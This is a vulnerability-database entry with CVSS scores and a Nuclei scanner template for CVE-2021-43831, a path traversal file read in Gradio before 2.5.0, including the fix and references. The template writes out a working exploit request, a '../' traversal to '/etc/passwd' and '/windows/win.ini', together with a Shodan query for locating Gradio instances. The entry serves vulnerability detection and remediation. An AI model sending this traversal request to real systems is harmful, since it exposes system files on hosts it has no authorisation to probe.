Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-43831
HistoryJun 15, 2024 - 12:43 p.m.

Gradio < 2.5.0 - Arbitrary File Read

2024-06-1512:43:59
ProjectDiscovery
github.com
3
cve
cve2021
lfi
gradio
arbitrary file read
file access
update.

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

7.7 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.006 Low

EPSS

Percentile

79.0%

Files on the host computer can be accessed from the Gradio interface
id: CVE-2021-43831

info:
  name: Gradio < 2.5.0 - Arbitrary File Read
  author: isacaya
  severity: high
  description: |
    Files on the host computer can be accessed from the Gradio interface
  impact: |
    An attacker would be able to view the contents of a file on the computer.
  remediation: |
    Update to version 2.5.0.
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
    - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2021-43831
    cwe-id: CWE-22
    epss-score: 0.00063
    epss-percentile: 0.26511
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
  metadata:
    vendor: gradio_project
    product: gradio
    framework: python
    shodan-query: title:"Gradio"
  tags: cve,cve2021,lfi,gradio

http:
  - method: GET
    path:
      - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"

    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:N/A:N

7.7 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.006 Low

EPSS

Percentile

79.0%

Related for NUCLEI:CVE-2021-43831